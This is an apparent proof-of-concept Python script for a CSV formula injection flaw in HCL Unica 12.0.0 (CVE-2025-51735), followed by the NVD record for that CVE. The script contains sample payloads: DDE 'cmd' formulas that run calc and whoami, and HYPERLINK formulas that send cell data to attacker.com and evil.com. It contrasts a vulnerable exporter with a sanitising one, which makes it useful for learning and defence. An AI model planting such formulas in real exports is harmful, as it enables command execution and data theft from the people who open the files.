CVE-2025-51735

# CSV Formula Injection PoC for CVE-2025-51735 # HCL Unica 12.0.0 CSV Formula Injection # Malicious CSV content that triggers formula execution malicious_csv_content = '''Name,Email,Department,Salary John Doe,[email protected],Engineering,50000 =cmd|'/c calc'!A0,[email protected],Hacking,100000 +HYPERLINK("http://attacker.com/steal?data="&A1&A2,"Click") =DDE("cmd";"/c whoami";"A0") @SUM(A1:A100) ''' # Simulated vulnerable export function def vulnerable_export_to_csv(user_data): """ Simulates vulnerable CSV export without input sanitization """ csv_output = "Name,Email,Department,Salary\n" for record in user_data: # Vulnerable: Direct concatenation without sanitization csv_output += f"{record['name']},{record['email']},{record['dept']},{record['salary']}\n" return csv_output # Safe export function with proper sanitization def safe_export_to_csv(user_data): """ Secure CSV export with proper input sanitization """ import csv import io def sanitize_field(field): """Sanitize CSV fields to prevent formula injection""" if isinstance(field, str): # Prefix formula triggers with single quote if field.startswith(('=', '+', '-', '@', '\t', '\r', '\n')): field = "'" + field # Escape quotes field = field.replace('"', '""') return field output = io.StringIO() writer = csv.writer(output, quoting=csv.QUOTE_ALL) for record in user_data: sanitized_record = [sanitize_field(v) for v in record.values()] writer.writerow(sanitized_record) return output.getvalue() # Example usage if __name__ == "__main__": # Attacker-controlled input with malicious formula attacker_data = [ {"name": "Normal User", "email": "[email protected]", "dept": "Sales", "salary": "45000"}, {"name": "=cmd|'/c calc'!A0", "email": "[email protected]", "dept": "Hacking", "salary": "999999"}, {"name": "+HYPERLINK(\"http://evil.com?data=\"&A1,\"Click\")", "email": "[email protected]", "dept": "Social", "salary": "0"} ] print("[+] Vulnerable CSV Output:") print(vulnerable_export_to_csv(attacker_data)) print("\n[+] Safe CSV Output:") print(safe_export_to_csv(attacker_data))

{"cve": {"id": "CVE-2025-51735", "sourceIdentifier": "[email protected]", "published": "2025-11-28T15:16:01.410", "lastModified": "2025-12-02T20:58:21.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CSV formula injection vulnerability in HCL Technologies Ltd. Unica 12.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica:12.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7E79CAB-2508-4CBD-A075-BEEE2B503C30"}]}]}], "references": [{"url": "https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}